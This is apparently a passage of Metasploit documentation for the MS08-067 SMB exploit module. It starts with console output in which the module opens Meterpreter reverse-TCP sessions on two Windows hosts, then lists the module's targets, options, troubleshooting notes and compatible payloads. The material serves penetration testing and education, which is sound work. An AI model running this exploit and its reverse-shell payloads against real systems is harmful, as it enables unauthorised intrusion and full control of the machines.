PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’

Knowledge Base


ms08_067_netapi is one of the most popular remote exploits against Microsoft Windows. It is
considered a reliable exploit and allows you to gain access as SYSTEM — the highest Windows
privilege. In modern day penetration tests, this exploit would most likely be used in an internal
environment and not so much from external due to the likelihood of a firewall.

The check command of ms08_067_netapi is also highly accurate, because it actually exercises the
vulnerable code path rather than checking passively.

Vulnerable Application


This exploit works against a vulnerable SMB service from one of these Windows systems:

  • Windows 2000
  • Windows XP
  • Windows 2003

To reliably determine whether the machine is vulnerable, you will have to either examine
the system’s patch level, or use a vulnerability check.

Verification Steps


Please see Basic Usage under Overview.

Options


Please see Required Options under Overview.

Scenarios


Failure to detect the language pack

On some Windows systems, ms08_067_netapi (as well as other SMB modules) might show you this
message:

Windows 2003 R2 Service Pack 2 - lang:Unknown

This happens because the targeted system does not allow itself to be enumerated without authentication.
In this case, you can either set a username and password so that automatic target detection works,
like this:

set SMBUSER [username]
set SMBPASS [password]

or set the target with the correct language manually, for example:

set target [target ID]

Unsafe configuration of LHOST

Although ms08_067_netapi is reliable enough for a memory corruption exploit, it has its own
denial-of-service moments. One scenario is an incorrectly configured LHOST option, which can
cause the target's SMB service to crash.


Msfconsole Usage


Here is how the windows/smb/ms08_067_netapi exploit module looks in the msfconsole:

msf6 > use exploit/windows/smb/ms08_067_netapi

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show info

       Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2008-10-28

Provided by:
  hdm <[email protected]>
  Brett Moore <[email protected]>
  frank2 <[email protected]>
  jduck <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  2   Windows XP SP0/SP1 Universal
  3   Windows 2003 SP0 Universal
  4   Windows XP SP2 English (AlwaysOn NX)
  5   Windows XP SP2 English (NX)
  6   Windows XP SP3 English (AlwaysOn NX)
  7   Windows XP SP3 English (NX)
  8   Windows XP SP2 Arabic (NX)
  9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
  10  Windows XP SP2 Chinese - Simplified (NX)
  11  Windows XP SP2 Chinese - Traditional (NX)
  12  Windows XP SP2 Czech (NX)
  13  Windows XP SP2 Danish (NX)
  14  Windows XP SP2 German (NX)
  15  Windows XP SP2 Greek (NX)
  16  Windows XP SP2 Spanish (NX)
  17  Windows XP SP2 Finnish (NX)
  18  Windows XP SP2 French (NX)
  19  Windows XP SP2 Hebrew (NX)
  20  Windows XP SP2 Hungarian (NX)
  21  Windows XP SP2 Italian (NX)
  22  Windows XP SP2 Japanese (NX)
  23  Windows XP SP2 Korean (NX)
  24  Windows XP SP2 Dutch (NX)
  25  Windows XP SP2 Norwegian (NX)
  26  Windows XP SP2 Polish (NX)
  27  Windows XP SP2 Portuguese - Brazilian (NX)
  28  Windows XP SP2 Portuguese (NX)
  29  Windows XP SP2 Russian (NX)
  30  Windows XP SP2 Swedish (NX)
  31  Windows XP SP2 Turkish (NX)
  32  Windows XP SP3 Arabic (NX)
  33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
  34  Windows XP SP3 Chinese - Simplified (NX)
  35  Windows XP SP3 Chinese - Traditional (NX)
  36  Windows XP SP3 Czech (NX)
  37  Windows XP SP3 Danish (NX)
  38  Windows XP SP3 German (NX)
  39  Windows XP SP3 Greek (NX)
  40  Windows XP SP3 Spanish (NX)
  41  Windows XP SP3 Finnish (NX)
  42  Windows XP SP3 French (NX)
  43  Windows XP SP3 Hebrew (NX)
  44  Windows XP SP3 Hungarian (NX)
  45  Windows XP SP3 Italian (NX)
  46  Windows XP SP3 Japanese (NX)
  47  Windows XP SP3 Korean (NX)
  48  Windows XP SP3 Dutch (NX)
  49  Windows XP SP3 Norwegian (NX)
  50  Windows XP SP3 Polish (NX)
  51  Windows XP SP3 Portuguese - Brazilian (NX)
  52  Windows XP SP3 Portuguese (NX)
  53  Windows XP SP3 Russian (NX)
  54  Windows XP SP3 Swedish (NX)
  55  Windows XP SP3 Turkish (NX)
  56  Windows 2003 SP1 English (NO NX)
  57  Windows 2003 SP1 English (NX)
  58  Windows 2003 SP1 Japanese (NO NX)
  59  Windows 2003 SP1 Spanish (NO NX)
  60  Windows 2003 SP1 Spanish (NX)
  61  Windows 2003 SP1 French (NO NX)
  62  Windows 2003 SP1 French (NX)
  63  Windows 2003 SP2 English (NO NX)
  64  Windows 2003 SP2 English (NX)
  65  Windows 2003 SP2 German (NO NX)
  66  Windows 2003 SP2 German (NX)
  67  Windows 2003 SP2 Portuguese - Brazilian (NX)
  68  Windows 2003 SP2 Spanish (NO NX)
  69  Windows 2003 SP2 Spanish (NX)
  70  Windows 2003 SP2 Japanese (NO NX)
  71  Windows 2003 SP2 French (NO NX)
  72  Windows 2003 SP2 French (NX)

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    445              yes       The SMB service port (TCP)
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 408
  Avoid: 8 characters

Description:
  This module exploits a parsing flaw in the path canonicalization 
  code of NetAPI32.dll through the Server Service. This module is 
  capable of bypassing NX on some operating systems and service packs. 
  The correct target must be used to prevent the Server Service (along 
  with a dozen others in the same process) from crashing. Windows XP 
  targets seem to handle multiple successful exploitation events, but 
  2003 targets will often crash or hang on subsequent attempts. This 
  is just the first version of this module, full support for NX bypass 
  on 2003, along with other platforms, is still in development.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2008-4250
  OSVDB (49243)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

Module Options


This is a complete list of options available in the windows/smb/ms08_067_netapi exploit:

msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Advanced Options


Here is a complete list of advanced options supported by the windows/smb/ms08_067_netapi exploit:

msf6 exploit(windows/smb/ms08_067_netapi) > show advanced

Module advanced options (exploit/windows/smb/ms08_067_netapi):

   Name                    Current Setting    Required  Description
   ----                    ---------------    --------  -----------
   CHOST                                      no        The local client address
   CPORT                                      no        The local client port
   ConnectTimeout          10                 yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                     no        The information file that contains context information
   DCERPC::ReadTimeout     10                 yes       The number of seconds to wait for DCERPC responses
   DisablePayloadHandler   false              no        Disable the handler code for the selected payload
   EnableContextEncoding   false              no        Use transient context when encoding payloads
   NTLM::SendLM            true               yes       Always send the LANMAN response (except when NTLMv2_session is specified)
   NTLM::SendNTLM          true               yes       Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
   NTLM::SendSPN           true               yes       Send an avp of type SPN in the ntlmv2 client blob, this allows authentication on Windows 7+/Server 2008 R2+ when SPN is required
   NTLM::UseLMKey          false              yes       Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
   NTLM::UseNTLM2_session  true               yes       Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
   NTLM::UseNTLMv2         true               yes       Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   SMB::AlwaysEncrypt      true               yes       Enforces encryption even if the server does not require it (SMB3.x only). Note that when it is set to false, the SMB client will still encrypt the communication if the server requires it
   SMB::ChunkSize          500                yes       The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing
   SMB::Native_LM          Windows 2000 5.0   yes       The Native LM to send during authentication
   SMB::Native_OS          Windows 2000 2195  yes       The Native OS to send during authentication
   SMB::VerifySignature    false              yes       Enforces client-side verification of server response signatures
   SMBDirect               true               no        The target port is a raw SMB service (not NetBIOS)
   SMBDomain               .                  no        The Windows domain to use for authentication
   SMBName                 *SMBSERVER         yes       The NetBIOS hostname (required for port 139 connections)
   SMBPass                                    no        The password for the specified username
   SMBUser                                    no        The username to authenticate as
   SSL                     false              no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                  no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER               no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto               yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false              no        Enable detailed status messages
   WORKSPACE                                  no        Specify the workspace for this module
   WfsDelay                2                  no        Additional delay in seconds to wait for a session

Payload advanced options (windows/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadBindPort                               no        Port to bind reverse tcp socket to on target system.
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the windows/smb/ms08_067_netapi module can exploit:

msf6 exploit(windows/smb/ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   6   Windows XP SP3 English (AlwaysOn NX)
   7   Windows XP SP3 English (NX)
   8   Windows XP SP2 Arabic (NX)
   9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
   10  Windows XP SP2 Chinese - Simplified (NX)
   11  Windows XP SP2 Chinese - Traditional (NX)
   12  Windows XP SP2 Czech (NX)
   13  Windows XP SP2 Danish (NX)
   14  Windows XP SP2 German (NX)
   15  Windows XP SP2 Greek (NX)
   16  Windows XP SP2 Spanish (NX)
   17  Windows XP SP2 Finnish (NX)
   18  Windows XP SP2 French (NX)
   19  Windows XP SP2 Hebrew (NX)
   20  Windows XP SP2 Hungarian (NX)
   21  Windows XP SP2 Italian (NX)
   22  Windows XP SP2 Japanese (NX)
   23  Windows XP SP2 Korean (NX)
   24  Windows XP SP2 Dutch (NX)
   25  Windows XP SP2 Norwegian (NX)
   26  Windows XP SP2 Polish (NX)
   27  Windows XP SP2 Portuguese - Brazilian (NX)
   28  Windows XP SP2 Portuguese (NX)
   29  Windows XP SP2 Russian (NX)
   30  Windows XP SP2 Swedish (NX)
   31  Windows XP SP2 Turkish (NX)
   32  Windows XP SP3 Arabic (NX)
   33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
   34  Windows XP SP3 Chinese - Simplified (NX)
   35  Windows XP SP3 Chinese - Traditional (NX)
   36  Windows XP SP3 Czech (NX)
   37  Windows XP SP3 Danish (NX)
   38  Windows XP SP3 German (NX)
   39  Windows XP SP3 Greek (NX)
   40  Windows XP SP3 Spanish (NX)
   41  Windows XP SP3 Finnish (NX)
   42  Windows XP SP3 French (NX)
   43  Windows XP SP3 Hebrew (NX)
   44  Windows XP SP3 Hungarian (NX)
   45  Windows XP SP3 Italian (NX)
   46  Windows XP SP3 Japanese (NX)
   47  Windows XP SP3 Korean (NX)
   48  Windows XP SP3 Dutch (NX)
   49  Windows XP SP3 Norwegian (NX)
   50  Windows XP SP3 Polish (NX)
   51  Windows XP SP3 Portuguese - Brazilian (NX)
   52  Windows XP SP3 Portuguese (NX)
   53  Windows XP SP3 Russian (NX)
   54  Windows XP SP3 Swedish (NX)
   55  Windows XP SP3 Turkish (NX)
   56  Windows 2003 SP1 English (NO NX)
   57  Windows 2003 SP1 English (NX)
   58  Windows 2003 SP1 Japanese (NO NX)
   59  Windows 2003 SP1 Spanish (NO NX)
   60  Windows 2003 SP1 Spanish (NX)
   61  Windows 2003 SP1 French (NO NX)
   62  Windows 2003 SP1 French (NX)
   63  Windows 2003 SP2 English (NO NX)
   64  Windows 2003 SP2 English (NX)
   65  Windows 2003 SP2 German (NO NX)
   66  Windows 2003 SP2 German (NX)
   67  Windows 2003 SP2 Portuguese - Brazilian (NX)
   68  Windows 2003 SP2 Spanish (NO NX)
   69  Windows 2003 SP2 Spanish (NX)
   70  Windows 2003 SP2 Japanese (NO NX)
   71  Windows 2003 SP2 French (NO NX)
   72  Windows 2003 SP2 French (NX)

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the windows/smb/ms08_067_netapi exploit:

msf6 exploit(windows/smb/ms08_067_netapi) > show payloads

Compatible Payloads
===================

   #    Name                                                        Disclosure Date  Rank    Check  Description
   -    ----                                                        ---------------  ----    -----  -----------
   0    payload/generic/custom                                                       normal  No     Custom Payload
   1    payload/generic/debug_trap                                                   normal  No     Generic x86 Debug Trap
   2    payload/generic/shell_bind_tcp                                               normal  No     Generic Command Shell, Bind TCP Inline
   3    payload/generic/shell_reverse_tcp                                            normal  No     Generic Command Shell, Reverse TCP Inline
   4    payload/generic/tight_loop                                                   normal  No     Generic x86 Tight Loop
   5    payload/windows/adduser                                                      normal  No     Windows Execute net user /ADD
   6    payload/windows/dllinject/bind_hidden_ipknock_tcp                            normal  No     Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
   7    payload/windows/dllinject/bind_hidden_tcp                                    normal  No     Reflective DLL Injection, Hidden Bind TCP Stager
   8    payload/windows/dllinject/bind_ipv6_tcp                                      normal  No     Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
   9    payload/windows/dllinject/bind_ipv6_tcp_uuid                                 normal  No     Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   10   payload/windows/dllinject/bind_named_pipe                                    normal  No     Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
   11   payload/windows/dllinject/bind_nonx_tcp                                      normal  No     Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   12   payload/windows/dllinject/bind_tcp                                           normal  No     Reflective DLL Injection, Bind TCP Stager (Windows x86)
   13   payload/windows/dllinject/bind_tcp_uuid                                      normal  No     Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
   14   payload/windows/dllinject/reverse_hop_http                                   normal  No     Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
   15   payload/windows/dllinject/reverse_ipv6_tcp                                   normal  No     Reflective DLL Injection, Reverse TCP Stager (IPv6)
   16   payload/windows/dllinject/reverse_nonx_tcp                                   normal  No     Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   17   payload/windows/dllinject/reverse_ord_tcp                                    normal  No     Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   18   payload/windows/dllinject/reverse_tcp                                        normal  No     Reflective DLL Injection, Reverse TCP Stager
   19   payload/windows/dllinject/reverse_tcp_allports                               normal  No     Reflective DLL Injection, Reverse All-Port TCP Stager
   20   payload/windows/dllinject/reverse_tcp_dns                                    normal  No     Reflective DLL Injection, Reverse TCP Stager (DNS)
   21   payload/windows/dllinject/reverse_tcp_uuid                                   normal  No     Reflective DLL Injection, Reverse TCP Stager with UUID Support
   22   payload/windows/dns_txt_query_exec                                           normal  No     DNS TXT Record Payload Download and Execution
   23   payload/windows/exec                                                         normal  No     Windows Execute Command
   24   payload/windows/format_all_drives                                            manual  No     Windows Drive Formatter
   25   payload/windows/loadlibrary                                                  normal  No     Windows LoadLibrary Path
   26   payload/windows/messagebox                                                   normal  No     Windows MessageBox
   27   payload/windows/meterpreter/bind_hidden_ipknock_tcp                          normal  No     Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
   28   payload/windows/meterpreter/bind_hidden_tcp                                  normal  No     Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
   29   payload/windows/meterpreter/bind_ipv6_tcp                                    normal  No     Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   30   payload/windows/meterpreter/bind_ipv6_tcp_uuid                               normal  No     Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   31   payload/windows/meterpreter/bind_named_pipe                                  normal  No     Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
   32   payload/windows/meterpreter/bind_nonx_tcp                                    normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   33   payload/windows/meterpreter/bind_tcp                                         normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
   34   payload/windows/meterpreter/bind_tcp_uuid                                    normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   35   payload/windows/meterpreter/reverse_hop_http                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   36   payload/windows/meterpreter/reverse_https_proxy                              normal  No     Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
   37   payload/windows/meterpreter/reverse_ipv6_tcp                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   38   payload/windows/meterpreter/reverse_named_pipe                               normal  No     Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
   39   payload/windows/meterpreter/reverse_nonx_tcp                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   40   payload/windows/meterpreter/reverse_ord_tcp                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   41   payload/windows/meterpreter/reverse_tcp                                      normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   42   payload/windows/meterpreter/reverse_tcp_allports                             normal  No     Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   43   payload/windows/meterpreter/reverse_tcp_dns                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   44   payload/windows/meterpreter/reverse_tcp_uuid                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
   45   payload/windows/metsvc_bind_tcp                                              normal  No     Windows Meterpreter Service, Bind TCP
   46   payload/windows/metsvc_reverse_tcp                                           normal  No     Windows Meterpreter Service, Reverse TCP Inline
   47   payload/windows/patchupdllinject/bind_hidden_ipknock_tcp                     normal  No     Windows Inject DLL, Hidden Bind Ipknock TCP Stager
   48   payload/windows/patchupdllinject/bind_hidden_tcp                             normal  No     Windows Inject DLL, Hidden Bind TCP Stager
   49   payload/windows/patchupdllinject/bind_ipv6_tcp                               normal  No     Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
   50   payload/windows/patchupdllinject/bind_ipv6_tcp_uuid                          normal  No     Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   51   payload/windows/patchupdllinject/bind_named_pipe                             normal  No     Windows Inject DLL, Windows x86 Bind Named Pipe Stager
   52   payload/windows/patchupdllinject/bind_nonx_tcp                               normal  No     Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   53   payload/windows/patchupdllinject/bind_tcp                                    normal  No     Windows Inject DLL, Bind TCP Stager (Windows x86)
   54   payload/windows/patchupdllinject/bind_tcp_uuid                               normal  No     Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
   55   payload/windows/patchupdllinject/reverse_ipv6_tcp                            normal  No     Windows Inject DLL, Reverse TCP Stager (IPv6)
   56   payload/windows/patchupdllinject/reverse_nonx_tcp                            normal  No     Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   57   payload/windows/patchupdllinject/reverse_ord_tcp                             normal  No     Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   58   payload/windows/patchupdllinject/reverse_tcp                                 normal  No     Windows Inject DLL, Reverse TCP Stager
   59   payload/windows/patchupdllinject/reverse_tcp_allports                        normal  No     Windows Inject DLL, Reverse All-Port TCP Stager
   60   payload/windows/patchupdllinject/reverse_tcp_dns                             normal  No     Windows Inject DLL, Reverse TCP Stager (DNS)
   61   payload/windows/patchupdllinject/reverse_tcp_uuid                            normal  No     Windows Inject DLL, Reverse TCP Stager with UUID Support
   62   payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp                   normal  No     Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
   63   payload/windows/patchupmeterpreter/bind_hidden_tcp                           normal  No     Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
   64   payload/windows/patchupmeterpreter/bind_ipv6_tcp                             normal  No     Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
   65   payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid                        normal  No     Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   66   payload/windows/patchupmeterpreter/bind_named_pipe                           normal  No     Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
   67   payload/windows/patchupmeterpreter/bind_nonx_tcp                             normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   68   payload/windows/patchupmeterpreter/bind_tcp                                  normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
   69   payload/windows/patchupmeterpreter/bind_tcp_uuid                             normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
   70   payload/windows/patchupmeterpreter/reverse_ipv6_tcp                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   71   payload/windows/patchupmeterpreter/reverse_nonx_tcp                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   72   payload/windows/patchupmeterpreter/reverse_ord_tcp                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   73   payload/windows/patchupmeterpreter/reverse_tcp                               normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   74   payload/windows/patchupmeterpreter/reverse_tcp_allports                      normal  No     Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   75   payload/windows/patchupmeterpreter/reverse_tcp_dns                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   76   payload/windows/patchupmeterpreter/reverse_tcp_uuid                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
   77   payload/windows/peinject/bind_hidden_ipknock_tcp                             normal  No     Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
   78   payload/windows/peinject/bind_hidden_tcp                                     normal  No     Windows Inject PE Files, Hidden Bind TCP Stager
   79   payload/windows/peinject/bind_ipv6_tcp                                       normal  No     Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
   80   payload/windows/peinject/bind_ipv6_tcp_uuid                                  normal  No     Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   81   payload/windows/peinject/bind_named_pipe                                     normal  No     Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
   82   payload/windows/peinject/bind_nonx_tcp                                       normal  No     Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
   83   payload/windows/peinject/bind_tcp                                            normal  No     Windows Inject PE Files, Bind TCP Stager (Windows x86)
   84   payload/windows/peinject/bind_tcp_uuid                                       normal  No     Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
   85   payload/windows/peinject/reverse_ipv6_tcp                                    normal  No     Windows Inject PE Files, Reverse TCP Stager (IPv6)
   86   payload/windows/peinject/reverse_named_pipe                                  normal  No     Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
   87   payload/windows/peinject/reverse_nonx_tcp                                    normal  No     Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
   88   payload/windows/peinject/reverse_ord_tcp                                     normal  No     Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
   89   payload/windows/peinject/reverse_tcp                                         normal  No     Windows Inject PE Files, Reverse TCP Stager
   90   payload/windows/peinject/reverse_tcp_allports                                normal  No     Windows Inject PE Files, Reverse All-Port TCP Stager
   91   payload/windows/peinject/reverse_tcp_dns                                     normal  No     Windows Inject PE Files, Reverse TCP Stager (DNS)
   92   payload/windows/peinject/reverse_tcp_uuid                                    normal  No     Windows Inject PE Files, Reverse TCP Stager with UUID Support
   93   payload/windows/pingback_bind_tcp                                            normal  No     Windows x86 Pingback, Bind TCP Inline
   94   payload/windows/pingback_reverse_tcp                                         normal  No     Windows x86 Pingback, Reverse TCP Inline
   95   payload/windows/powershell_bind_tcp                                          normal  No     Windows Interactive Powershell Session, Bind TCP
   96   payload/windows/powershell_reverse_tcp                                       normal  No     Windows Interactive Powershell Session, Reverse TCP
   97   payload/windows/shell/bind_hidden_ipknock_tcp                                normal  No     Windows Command Shell, Hidden Bind Ipknock TCP Stager
   98   payload/windows/shell/bind_hidden_tcp                                        normal  No     Windows Command Shell, Hidden Bind TCP Stager
   99   payload/windows/shell/bind_ipv6_tcp                                          normal  No     Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
   100  payload/windows/shell/bind_ipv6_tcp_uuid                                     normal  No     Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   101  payload/windows/shell/bind_named_pipe                                        normal  No     Windows Command Shell, Windows x86 Bind Named Pipe Stager
   102  payload/windows/shell/bind_nonx_tcp                                          normal  No     Windows Command Shell, Bind TCP Stager (No NX or Win7)
   103  payload/windows/shell/bind_tcp                                               normal  No     Windows Command Shell, Bind TCP Stager (Windows x86)
